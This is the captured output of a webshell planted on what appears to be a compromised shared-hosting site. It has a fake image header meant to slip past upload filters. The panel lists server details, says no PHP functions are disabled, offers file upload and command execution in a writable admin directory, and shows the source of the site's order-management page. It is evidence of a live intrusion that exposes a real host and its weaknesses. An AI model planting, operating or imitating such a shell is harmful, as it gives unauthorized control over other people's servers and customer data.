���� JFIF    fdasasfas213sdaf403WebShell
403Webshell
Server IP : 147.79.69.148  /  Your IP : 216.73.216.200
Web Server : LiteSpeed
System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User : u479334040 ( 479334040)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u479334040/domains/saumasale.in/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u479334040/domains/saumasale.in/public_html/admin/order.php
<?php
session_start();
if (empty($_SESSION['logged_in_id'])) {
   header('Location:login.php');
}
include_once('includes/db.php');
$ob = new database();

include('function.php');
head();
?>

<div class="content-wrapper">
   <section class="content mt-2">
      <div class="container-fluid">
         <div class="row">
            <div class="col-12">
               <div class="card">
                  <div class="card-header">
                     <h2 class="card-title">Order</h2>
                  </div>
                  <!-- /.card-header -->
                  <div class="card-body">
                     <table id="example201" class="table table-bordered table-striped">
                        <thead>
                           <tr>
                              <th>S No.</th>
                              <th>User</th>
                              <th>Product</th>
                              <th>Quantity</th>
                              <th>Amount</th>
                              <th>Order Date</th>
                              <th>Payment Method</th>
                              <th>Status</th>
                              <th>Action</th>
                           </tr>
                        </thead>
                        <tbody id="show_order" class="show_order"></tbody>
                     </table>
                  </div>
                  <!-- /.card-body -->
               </div>
               <!-- /.card -->
            </div>
            <!-- /.col -->
         </div>
         <!-- /.row -->
      </div>
      <!-- /.container-fluid -->
   </section>



   <!-- /.content -->
</div>

<div class="modal fade mt-3" id="myuser">
   <div class="modal-dialog modal-lg">
      <div class="modal-content">
         <div class="modal-header mymodel-header">
            <h4 class="modal-title mymodel-title">Edit Order</h4>
            <button type="button" class="mymodel-button close" data-dismiss="modal" aria-label="Close">
               <span aria-hidden="true">&times;</span>
            </button>
         </div>
         <div class="order_edit"></div>

      </div>
   </div>
</div>


<?php foter(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit